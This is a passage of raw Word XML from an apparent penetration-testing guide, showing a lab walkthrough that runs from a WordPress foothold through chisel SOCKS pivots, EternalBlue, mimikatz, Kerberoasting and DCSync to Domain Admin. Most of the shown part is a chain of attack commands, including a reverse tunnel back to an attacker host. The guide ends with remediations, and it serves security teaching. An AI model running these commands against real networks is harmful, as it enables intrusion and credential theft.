      <w:r w:rsidRPr="00F17F75">
        <w:t>twentytwenty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>/404.php</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">"  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> catcher: nc -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6F05CE" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">id   </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># www-data on PIVOT-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743E68C7" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phase 3 — Discover the internal segment.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> PIVOT-1 is dual-homed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19469C4C" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> a          </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"># eth0 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>10.10.10.10  ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> eth1 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>172.16.20.10  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&gt; reaches 172.16.20.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E6C8C8" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -a        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># neighbors: 172.16.20.5, .20, .24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B16AD5" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phase 4 — Pivot #1 (SOCKS into tier-2).</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> Reverse chisel back to you, expose SOCKS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055C66D7" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># ATTACKER: chisel server -p 443 --reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E20A71" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t># PIVOT-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>1 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> chisel client 10.10.14.2:443 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>R:socks</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2EB75DB4" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; socks5 127.0.0.1 1080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B929543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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>sT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -p 445,88,389 172.16.20.5 172.16.20.20    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># DC + a Win2008</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51750122" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phase 5 — Internal exploit (AD range entry).</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>172.16.20.20</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (Win2008) is MS17-010-vulnerable; exploit it via a Meterpreter route or over the SOCKS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B94E5F" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> route through PIVOT-1, then:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30003DE6" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14535A8D" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>172.16.20.20 ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> set LHOST </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>172.16.20.10 ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> exploit    # SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC59D53" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t># loot local creds:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24316BA5" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>sekurlsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>logonpasswords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FB6166" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phase 6 — Domain recon.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> With a domain user cred from the box, enumerate over the pivot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D45255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bloodhound-python -u svc -p 'Passw0rd!' -d lab.com -c all -ns 172.16.20.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20675D46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GetUserSPNs.py lab.com/svc:'Passw0rd!' -dc-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> 172.16.20.5 -request   </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Kerberoast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="38720A77" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -m 13100 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>tgs.hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> rockyou.txt                                            </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"># -&gt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>sqlsvc:Summer</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>2024!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A084E60" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>BloodHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> path: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>svc</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> → (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>Kerberoastable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sqlsvc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">) → group with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>DCSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> rights.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB375DD" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phase 7 — Double pivot (tier-3).</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>172.16.20.20</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> also has </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>172.16.30.20</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> → tier-3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>172.16.30.0/24</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBD99F2" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t># exploit 172.16.20.20 gave a session; add the deeper route:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC799BA" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>run autoroute -s 172.16.30.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166152FC" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t># second reverse SOCKS (chisel) through PIVOT-2 for non-MSF tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB93BEE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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>sT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> 172.16.30.30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133CDDA6" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phase 8 — Domain compromise (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DCSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sqlsvc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> has replication rights → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>DCSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> the DC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210FE806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secretsdump.py lab.com/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>sqlsvc:'Summer2024!'@172.16.20.5</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -just-dc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A44E2ED" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"># -&gt; Administrator + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> NTLM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC29981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psexec.py -hashes :&lt;admin-NTLM&gt; administrator@172.16.20.5   </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># SYSTEM on the DC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2787CA00" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chain summary (each link a fixable finding):</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WordPress weak admin → PHP RCE (www-data)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> → dual-homed pivot → </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>chisel SOCKS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> into 172.16.20.0/24 → </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MS17-010</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> SYSTEM on Win2008 → </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">domain user creds → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kerberoast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sqlsvc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DCSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Domain Admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>plus</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>double pivot</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> into 172.16.30.0/24 for the remaining targets. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>report's attack narrative</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> is exactly this segment-by-segment path with a network diagram; remediations (strong wp creds + disable theme editor, patch MS17-010, strong service-account password, tier the DA rights, segment the DMZ NIC) each break a link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5D1734" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:pict w14:anchorId="64B8F486">
          <v:rect id="_x0000_i1209" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="514FD804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 xml:space="preserve">22. Worked Engagement #2 — Exposed service → Linux </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> → SSH pivot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1EFF25" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">A second chain from a different entry point, using SSH forwarding + Linux </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>. Authorized/lab, placeholder IPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632F2BA5" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phase 1 — Edge foothold (service exploit).</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> DMZ host </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.10.10.10</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> runs a vulnerable web/app service; a known exploit or SQLi </w:t>
      </w:r>
